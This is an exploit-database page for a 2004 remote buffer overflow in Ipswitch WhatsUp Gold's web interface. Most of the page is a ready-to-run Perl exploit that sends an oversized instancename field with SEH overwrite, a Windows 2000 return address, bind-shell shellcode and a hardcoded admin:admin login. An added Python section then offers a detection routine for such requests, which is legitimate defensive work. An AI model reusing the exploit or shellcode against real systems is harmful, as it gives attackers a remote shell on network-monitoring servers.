Ipswitch WhatsUp Gold 7.0/8.0 – Notification Instance Name Remote Buffer Overflow

Vulnerability ID: 1054581 Vulnerability type: (not given)
Published: 2004-09-03 Updated: 2004-09-03
CVE ID: N/A
CNNVD ID: N/A
Platform: Windows CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/24572
|Details
Vulnerability details have not been disclosed.
|Exploit
source: http://www.securityfocus.com/bid/11109/info

The Ipswitch WhatsUp Gold web interface is prone to a remotely exploitable buffer overflow vulnerability. This may be exploited by authenticated users of the interface to execute arbitrary code in the context of the program.

#!/usr/bin/perl
#  [LoWNOISE] NotmuchG.pl  v.1.5
# ================================================
#  IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE  Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured Exception Handler
# installed by WhatsUp, which points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 bytes long to generate an exception that can
# be manipulated by changing the SEH pointer (ret at offset 815).
#
#
# Bug discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces, the seltiks, p0ch1n, Ritt3r, Mav, f4lc0n..

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# Bind shellcode, listens on port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52".
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1".
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01".
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b".
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32".
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff".
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe".
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff".
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89".
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff".
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a".
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb".
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0".
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44".
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b".
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff".
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff".
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0".
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";

$socket->autoflush(1);

# Request headers (each header must end with CRLF; keep them on one line each)
print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, application/vnd.citrix.AdvGWClient-2_2, */*\r\n";
print $socket "Referer: http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n";
print $socket "Accept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";


# Layout of the overflowing instancename field:
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]

$cmd .= "A"x811; # 815 - 4
$cmd .= "\xeb\x06\x90\x90"; # jumper <eb 06> <garbage>: short jmp over the SEH pointer to the shellcode


#$cmd .= "\xfe\x63\xa1\x71"; # winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75";  # win2k sp0-sp4 ws2help.dll

#$cmd .= "LOWNOISE";        # garbage :D
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); # more padding

$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";

close($socket);
exit(0);

sub usage
{
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "===================================================\n";
print "\nUsage: NotmuchG.pl [host] [port]\n";
print "[host]  Target host\n[port]  WhatsUp webserver port\n\n";
print "\n Shell on tcp port 28876.\n\n";
print "ET LoWNOISE 2004\n";
exit(1);
}
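The exploit above shows what the overflowing request looks like on the wire: a POST to /_maincfgret.cgi whose instancename form field runs to thousands of bytes, with the SEH pointer overwritten at offset 815. The following Python is an added detection example written for this page, not part of the original exploit or of WhatsUp Gold; it inspects a raw HTTP request captured on the WhatsUp web port and flags an instancename that is implausibly long or carries non-printable bytes. The 256-byte sanity threshold and the sample requests are constructed assumptions.

```python
from urllib.parse import unquote_to_bytes

# Offsets taken from the exploit above: the SEH pointer is overwritten at
# byte 815 of instancename and the whole overflow string is about 4080 bytes.
SEH_OFFSET = 815
TARGET_PATH = "/_maincfgret.cgi"
MAX_SANE_LEN = 256  # assumed threshold; real instance names are a few bytes long

def parse_form(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded body without text decoding,
    so raw high bytes in a field survive and can be measured."""
    fields = {}
    for pair in body.split(b"&"):
        key, _, value = pair.partition(b"=")
        fields[unquote_to_bytes(key)] = unquote_to_bytes(value.replace(b"+", b" "))
    return fields

def inspect_request(raw: bytes) -> dict:
    """Return a verdict for one raw HTTP request captured from the WhatsUp web port."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    method, path = request_line.split(b" ")[:2]
    verdict = {"path": path.decode("latin-1"), "suspicious": False, "reasons": []}
    if method != b"POST" or path != TARGET_PATH.encode():
        return verdict  # only the notification-type form carries the field
    name = parse_form(body).get(b"instancename", b"")
    verdict["instancename_len"] = len(name)
    if len(name) > MAX_SANE_LEN:
        verdict["suspicious"] = True
        verdict["reasons"].append("instancename longer than %d bytes" % MAX_SANE_LEN)
    if len(name) >= SEH_OFFSET + 4:
        verdict["reasons"].append("long enough to overwrite the SEH pointer")
    if any(b < 0x20 or b > 0x7e for b in name):
        verdict["suspicious"] = True
        verdict["reasons"].append("non-printable bytes in instancename")
    return verdict

# Constructed sample traffic (not from the page): one legitimate submit, one overflow.
BENIGN = (b"POST /_maincfgret.cgi HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n"
          b"page=notify&origname=&action=return&type=Beeper&instancename=Beeper&end=end")
OVERFLOW = (b"POST /_maincfgret.cgi HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n"
            b"page=notify&type=Beeper&instancename=" + b"A" * SEH_OFFSET
            + b"\xde\xad\xbe\xef" + b"\x90" * 100 + b"&end=end")

if __name__ == "__main__":
    for req in (BENIGN, OVERFLOW):
        print(inspect_request(req))
```

Because the interface requires HTTP Basic authentication, a hit on this rule also identifies which account submitted the request, which is the first thing to check during triage.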
